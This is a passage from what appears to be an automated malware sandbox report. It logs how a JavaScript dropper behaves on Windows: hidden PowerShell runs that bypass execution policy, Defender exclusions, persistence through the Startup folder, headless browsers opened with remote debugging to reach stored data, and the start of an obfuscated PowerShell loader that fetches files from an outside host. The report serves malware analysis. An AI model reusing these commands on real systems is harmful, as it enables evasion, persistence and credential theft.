              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\itncx.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hrhqu.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\puzvn.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe #by-unknown
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe #by-unknown
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe /stext "C:\Users\user\AppData\Local\Temp\phlxtjpg"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajqhtbaiibn"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe /stext "C:\Users\user\AppData\Local\Temp\cddauulbwjfhif"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1"
              Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4024 -parentBuildID 20230927232528 -prefsHandle 4180 -prefMapHandle 4176 -prefsLen 26099 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {229911da-61b2-4021-aed6-5898497fc069} 7712 "\\.\pipe\gecko-crash-server-pipe.7712" 290e9140e10 rdd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & copy "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js & del "1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\itncx.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: cryptbase.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: explorerframe.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textshaping.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textinputframework.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coreuicomponents.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: ntmarta.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Program Files\7-Zip\7zG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 